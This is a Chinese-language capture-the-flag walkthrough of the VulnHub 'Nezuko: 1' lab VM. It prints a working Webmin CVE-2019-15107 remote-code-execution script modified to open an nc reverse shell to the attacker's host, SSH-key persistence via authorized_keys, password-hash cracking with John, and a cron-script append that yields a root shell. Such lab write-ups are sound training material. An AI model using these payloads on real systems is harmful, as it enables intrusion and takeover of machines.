VulnHub渗透测试实战靶场 Nezuko: 1
靶场描述和提示:
Creator : @yunaranyancat (Twitter)
Difficulty : Easy ~ Intermediate
OS Used: Ubuntu 18.04
User : root, zenitsu, nezuko
Hashes : at their home directory
任务:获取三个用户目录下的hash字符串
1、信息收集
nmap开路
msf5 > db_nmap -T4 10.1.1.0/24
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 16:38 CST
[*] Nmap: Nmap scan report for 10.1.1.1
[*] Nmap: Host is up (0.000061s latency).
[*] Nmap: Not shown: 999 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 53/tcp open domain
[*] Nmap: MAC Address: 00:50:56:E9:10:7F (VMware)
[*] Nmap: Nmap scan report for 10.1.1.129
[*] Nmap: Host is up (0.00054s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 22/tcp open ssh
[*] Nmap: 80/tcp open http
[*] Nmap: MAC Address: 00:0C:29:4E:52:32 (VMware)
[*] Nmap: Nmap scan report for 10.1.1.254
[*] Nmap: Host is up (0.000047s latency).
[*] Nmap: All 1000 scanned ports on 10.1.1.254 are filtered
[*] Nmap: MAC Address: 00:50:56:FB:FE:72 (VMware)
[*] Nmap: Nmap scan report for 10.1.1.130
[*] Nmap: Host is up (0.0000060s latency).
[*] Nmap: Not shown: 999 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 22/tcp open ssh
[*] Nmap: Nmap done: 256 IP addresses (4 hosts up) scanned in 5.49 seconds
msf5 >
除去网关和本机外,找到靶机的IP。
使用nmap -p- -A target_ip更加详尽的探测一下这个IP
msf5 > db_nmap -p- -A 10.1.1.129
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 16:42 CST
[*] Nmap: Nmap scan report for 10.1.1.129
[*] Nmap: Host is up (0.00060s latency).
[*] Nmap: Not shown: 65532 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: | 2048 4b:f5:b3:ff:35:a8:c8:24:42:66:64:a4:4b:da:b0:16 (RSA)
[*] Nmap: | 256 2e:0d:6d:5b:dc:fe:25:cb:1b:a7:a0:93:20:3a:32:04 (ECDSA)
[*] Nmap: |_ 256 bc:28:8b:e4:9e:8d:4c:c6:42:ab:0b:64:ea:8f:60:41 (ED25519)
[*] Nmap: 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
[*] Nmap: |_http-server-header: Apache/2.4.29 (Ubuntu)
[*] Nmap: |_http-title: Welcome to my site! - nezuko kamado
[*] Nmap: 13337/tcp open http MiniServ 1.920 (Webmin httpd)
[*] Nmap: | http-robots.txt: 1 disallowed entry
[*] Nmap: |_/
[*] Nmap: |_http-title: Login to Webmin
[*] Nmap: MAC Address: 00:0C:29:4E:52:32 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 3.X|4.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
[*] Nmap: OS details: Linux 3.2 - 4.9
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT ADDRESS
[*] Nmap: 1 0.60 ms 10.1.1.129
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 45.59 seconds
msf5 >
发现三个服务和端口是开放的:
22:SSH服务、80:HTTP服务、13337 :Webmin服务
访问一下HTTP服务看看有什么东西:有一个画风有点诡异的动画(Nezuko是一个日本动漫角色),和一句提示:“ Welcome to my site. I didn't put anything yet. Please come back again later ”,翻译过来应该是:“此地无银三百两”。我信你个鬼,你个糟老头坏得很。
经过一番探索,发现确实没有什么可利用的点(老外挺实诚的,说没有就真没有)。
我们再看看 13337 端口的Webmin服务:
2、获取Shell
结合前面探测到的Webmin版本是1.920,可以去百度一下(Google it),然后找到了这个:
Webmin 1.920 - Remote Code Execution (CVE-2019-15107)
https://www.exploit-db.com/exploits/47293
直接上poc:
root@osboxes:/tmp# cat poc.sh
#!/bin/sh
#
# CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
# based on Metasploit module https://www.exploit-db.com/exploits/47230
# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
#
# Fernando A. Lagos B. (Zerial)
# https://blog.zerial.org
# https://blog.nivel4.com
#
# The script sends a flag by a echo command then grep it. If match, target is vulnerable.
#
# Usage: sh CVE-2019-15107.sh https://target:port
# Example: sh CVE-2019-15107.sh https://localhost:10000
# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
#
FLAG="f3a0c13c3765137bcde68572707ae5c0"
URI=$1;
echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1
if [ $? -eq 0 ];
then
echo '\033[0;31mVULNERABLE!\033[0m'
else
echo '\033[0;32mOK! (target is not vulnerable)\033[0m'
fi
#EOF
root@osboxes:/tmp#root@osboxes:/tmp# ./poc.sh https://10.1.1.129:13337
Testing for RCE (CVE-2019-15107) on https://10.1.1.129:13337: VULNERABLE!
root@osboxes:/tmp#
提示存在漏洞。
那么就好办了,直接来反弹一个shell吧
然后改一下poc.sh这个脚本,把脚本里面执行echo '$FLAG'的那一段,改成nc -e /bin/bash attack_ip port就好了,改好之后就是这样的:
echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|nc -e /bin/bash 10.1.1.130 7777&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1
然后nc开监听,再执行poc.sh就能收到shell了
root@osboxes:/tmp# nc -lvp 7777
listening on [any] 7777 ...
10.1.1.129: inverse host lookup failed: Unknown host
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.129] 51590root@osboxes:/tmp# ./poc.sh https://10.1.1.129:13337
Testing for RCE (CVE-2019-15107) on https://10.1.1.129:13337:
执行一些常用命令,看看是什么权限?
root@osboxes:/tmp# nc -lvp 7777
listening on [any] 7777 ...
10.1.1.129: inverse host lookup failed: Unknown host
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.129] 51590
id
uid=1000(nezuko) gid=1000(nezuko) groups=1000(nezuko),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
ls /
bin
boot
我们得到的一个普通用户:nezuko的shell
升级为SSH会话,很简单,在攻击机上生成一个ssh key,然后写入到目标机就能ssh免密登录了。
本地生成密钥:
root@osboxes:/tmp# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): sshkey
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in sshkey.
Your public key has been saved in sshkey.pub.
The key fingerprint is:
SHA256:DDIRhslt7EUNR8P5py1hq1Q9CXN1nbk8s0XGBi+nAfo root@osboxes
The key's randomart image is:
+---[RSA 2048]----+
| . =+oo=+. ..oo=|
| +.+...+.o... =*|
| oo.. ..= .+++|
| .o o =.= X.|
| So *E.. =|
| . + . . |
| . . . |
| . |
| |
+----[SHA256]-----+
root@osboxes:/tmp#
复制公钥内容,在目标机shell里面写入到authorized_keys文件。
root@osboxes:/tmp# cat sshkey.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyD+owxKMrS8dGHsh2Cct8SB6/60S6UsTy/K+eSexh1tC+cT6E9RjtUpbtFnyZBlm9ICmrBlrun0OR8UhoeA0/b8rbl8QZbsDYYj1wHGkrL8QrxzMypfaCUTRl/eu/ADyyvpGtjmxD0utNU56BUypXDYJIZbQ2VKx6FSwTbs0yrVNdiw6exrlF+louJKr28xb4t6+RAe1R/vGI/yAKHZFTlkpc7hz+B4w7F3kdDpg1YtiJslLAkYtbCU1pDvImjSltWHV6zrCQzyRbMya8F1kvEF4UhjTFmnsgCHJfvTXLt8uBBi1kS73fzEzMvlqZ+T/8cMIZdkCjew7/rzCVmshR root@osboxes
root@osboxes:/tmp#echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCyD+owxKMrS8dGHsh2Cct8SB6/60S6UsTy/K+eSexh1tC+cT6E9RjtUpbtFnyZBlm9ICmrBlrun0OR8UhoeA0/b8rbl8QZbsDYYj1wHGkrL8QrxzMypfaCUTRl/eu/ADyyvpGtjmxD0utNU56BUypXDYJIZbQ2VKx6FSwTbs0yrVNdiw6exrlF+louJKr28xb4t6+RAe1R/vGI/yAKHZFTlkpc7hz+B4w7F3kdDpg1YtiJslLAkYtbCU1pDvImjSltWHV6zrCQzyRbMya8F1kvEF4UhjTFmnsgCHJfvTXLt8uBBi1kS73fzEzMvlqZ+T/8cMIZdkCjew7/rzCVmshR root@osboxes" > /home/nezuko/.ssh/authorized_keys
然后ssh连接:
root@osboxes:/tmp# ssh -i sshkey nezuko@10.1.1.129 //用密钥登录
The authenticity of host '10.1.1.129 (10.1.1.129)' can't be established.
ECDSA key fingerprint is SHA256:V+CV/i2363VkhS3dZOGMbavZHVA2zbsG5k0emqBTJZ4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.1.1.129' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.18.0-15-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
404 packages can be updated.
189 updates are security updates.
Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Wed Aug 21 01:12:52 2019
nezuko@ubuntu:~$ //登录成功
登录成功了。
如果你不想这么麻烦,直接用python -c 'import pty;pty.spawn("/bin/bash")'实现一个shell也可以。
3、横向提权
目前,我们获取的是一个普通用户权限的shell,想想如何提权吧。
先看看当前用户能获取的一些信息
nezuko@ubuntu:~$ pwd
nezuko@ubuntu:~$ ls -l
total 24
drwxr-xr-x 2 nezuko nezuko 4096 Ogos 28 21:45 from_zenitsu
-rw-rw-r-- 1 nezuko nezuko 19535 Ogos 21 00:25 nezuko.txt
看看nezuko.txt文件里面有什么:
nezuko@ubuntu:~$ cat nezuko.txt
Congratulations! You have found nezuko! Now, try to surpass your limit! Right here, right now...
....
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
1af0941e0c4bd4564932184d47dd8bef
有一句提示和一串hash
再看看from_zenitsu目录下有啥:
nezuko@ubuntu:~/from_zenitsu$ ls -l
total 284
-rw-r--r-- 1 root root 54 Ogos 21 01:13 new_message_21-08-2019_01:13
-rw-r--r-- 1 root root 54 Ogos 21 09:11 new_message_21-08-2019_09:11
-rw-r--r-- 1 root root 54 Ogos 21 09:12 new_message_21-08-2019_09:12
....
-rw-r--r-- 1 root root 54 Ogos 28 21:35 new_message_28-08-2019_21:35
-rw-r--r-- 1 root root 54 Ogos 28 21:40 new_message_28-08-2019_21:40
-rw-r--r-- 1 root root 54 Ogos 28 21:45 new_message_28-08-2019_21:45
-rw-r--r-- 1 root root 54 Ogos 28 21:50 new_message_28-08-2019_21:50
-rw-r--r-- 1 root root 54 Ogos 28 21:55 new_message_28-08-2019_21:55
-rw-r--r-- 1 root root 54 Ogos 29 2019 new_message_29-08-2019_00:05
nezuko@ubuntu:~/from_zenitsu$
这就很有意思,好像这些文件是自动创建的,而且是每5分钟一个。
随便看一个里面写了什么:
nezuko@ubuntu:~/from_zenitsu$ cat new_message_29-08-2019_00\:05
nezuko chan, would you like to go on a date with me? //这句话好暧昧~~
nezuko@ubuntu:~/from_zenitsu$
所以这些文件应该是zenitsu这个用户发来的。但文件的权限归属都是root,这就有点意思了。
所以,我们得横向提权到zenitsu用户看看。
先看看用户情况:
nezuko@ubuntu:~/from_zenitsu$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
nezuko:x:1000:1000:nezuko,,,:/home/nezuko:/bin/bash
zenitsu:$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0:1001:1001:,,,:/home/zenitsu:/bin/bash
sshd:x:122:65534::/run/sshd:/usr/sbin/nologin
nezuko@ubuntu:~/from_zenitsu$
我们发现zenitsu用户的密码hash被直接写在里面了。
用John The Ripper破解试试吧,找一个强大的字典,然后跑就是了
百度一下(Google it),找到一个字典合集:https://github.com/danielmiessler/SecLists
root@osboxes:/tmp# cat zenitsu_hash.txt
$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0
root@osboxes:/tmp#john --wordlist=rockyou.txt zenitsu_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password (?)
1g 0:00:00:01 DONE (2019-08-28 22:38) 0.5780g/s 4439p/s 4439c/s 4439C/s computador..escort
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@osboxes:/tmp# john zenitsu_hash.txt --show
?:password
1 password hash cracked, 0 left
root@osboxes:/tmp#
强大字典加持下,很快就破解出来了。我们切换到zenitsu用户看看吧
nezuko@ubuntu:~/from_zenitsu$ su - zenitsu
Password:
zenitsu@ubuntu:~$ pwd
/home/zenitsu
zenitsu@ubuntu:~$ id
uid=1001(zenitsu) gid=1001(zenitsu) groups=1001(zenitsu)
zenitsu@ubuntu:~$ ls -l
total 16
drwxr-xr-x 2 zenitsu root 4096 Ogos 21 09:39 to_nezuko
-rw-rw-r-- 1 zenitsu zenitsu 9343 Ogos 21 00:28 zenitsu.txt
zenitsu@ubuntu:~$
看到有一个目录是to_nezuko,进去看看吧
zenitsu@ubuntu:~$ cd to_nezuko/
zenitsu@ubuntu:~/to_nezuko$ ls -l
total 4
-rw-r--r-- 1 zenitsu root 150 Ogos 21 09:39 send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$
是一个脚本,可以看到这个脚本的权限是属于zenitsu用户和root组的,这个脚本的作用应该就是发消息给nezuko用户。
看看脚本内容吧:
zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date zenitsu@ubuntu:~/to_nezuko$
没错,这个就是每隔5分钟就给nezuko发一条骚扰信息的脚本。
4、获取root shell
结合前面我们获取的信息,我们猜测这个脚本应该是以root身份运行的,这就能解释为什么我们在nezuko用户from_zenitsu目录中看到的文件都是归属于root身份的。
既然这样的话,我们把想要以root身份执行的命令写入到这个脚本中,让它执行,不就可以获得root权限了吗?
当我们试着打开文件修改的时候,发现并不行:
"send_message_to_nezuko.sh" E212: Can't open file for writing
Press ENTER or type command to continue
这是为啥呢?看看是不是有隐藏权限:
zenitsu@ubuntu:~/to_nezuko$ lsattr send_message_to_nezuko.sh
-----a--------e--- send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$
发现有一个隐藏权限是a,也就是append。啥意思呢?就是某个档案给予了a(append)的权限后,用户只能追加内容到此档案,不能删除、修改此档案。那我们试试追加内容吧,这里就直接写一个nc反向连接吧:
zenitsu@ubuntu:~/to_nezuko$ echo "nc -e /bin/bash 10.1.1.130 9999" >> send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date
nc -e /bin/bash 10.1.1.130 9999
zenitsu@ubuntu:~/to_nezuko$
开监听,等5分钟:
root@osboxes:/tmp# nc -lvp 9999
listening on [any] 9999 ...
漫长的5分钟,可以去休息一下~~
五分钟后,收到root shell
root@osboxes:/tmp# nc -lvp 9999
listening on [any] 9999 ...
10.1.1.129: inverse host lookup failed: Unknown host
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.129] 36210
root@osboxes:/tmp# nc -lvp 9999
listening on [any] 9999 ...
10.1.1.129: inverse host lookup failed: Unknown host
connect to [10.1.1.130] from (UNKNOWN) [10.1.1.129] 36210
id
uid=0(root) gid=0(root) groups=0(root)
ls -l
total 8
-rw-r--r-- 1 root root 7190 Ogos 21 00:42 root.txt
cat root.txt
Congratulations on getting the root shell!
Tell me what do you think about this box at my twitter, @yunaranyancat
5、后记
在破密码部分,也可以用hashcat跑
反弹shell,也可以用msfvenom生成。
最后的拿root权限,也可以试试修改可执行命令的权限,来实现,比如加suid权限
6、参考资料
靶机环境下载:nezuko: 1 ~ VulnHub https://www.vulnhub.com/entry/nezuko-1,352/
